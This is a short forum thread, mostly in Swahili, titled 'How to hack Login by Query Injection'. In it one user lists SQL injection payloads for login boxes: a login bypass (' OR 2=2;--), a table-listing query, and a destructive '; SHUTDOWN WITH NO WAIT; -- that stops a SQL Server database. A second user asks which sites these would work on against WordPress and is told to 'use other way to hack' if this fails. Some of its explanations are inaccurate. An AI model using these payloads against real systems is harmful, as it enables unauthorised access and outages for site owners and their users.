How to hack Login by Query Injection.

[Emc2]

Many application developer they forget query injection problem.
Hapa chini ni njia ya kutest kama sehemu ya kulogin au kuingiza data kwenye system yeyote iko secured.

kwa mfano kwenye login.

' AND 1=1-- Hii inafanaya kuchukua taarifa zote ziliko kwenye database kwenye table hiyo.

Hapa ni kwenye SQL SERVER:-

'; SHUTDOWN WITH NO WAIT; --
Hizi code zina zima database server kama mtu ametumia query injection.

'; SELECT * FROM sys.tables;-- hii ina display table zote kwenye database.

NB: Kama unajua database design this is it. Hii issue inaweza ukalogin bila hata kutumia hata user ID
eg kwenye PHP mySQL Kwneye kibox cha user ID unaandika hivi

' OR 2=2 );--
au
' OR 2=2;--

 

[alphoncetz]

Have tried loging in to WordPress using ' OR 2=2 );-- then ' OR 2=2;-- ALL didn't work out
What PHP with MySQL script can the codes bypass login entries?

 

[Emc2]

Have tried loging in to WordPress using ' OR 2=2 );-- then ' OR 2=2;-- ALL didn't work out
What PHP with MySQL script can the codes bypass login entries?

I said when a programmer make Mistake and allow Query Injection. But if he do not make mistake so its good you can use other way to hack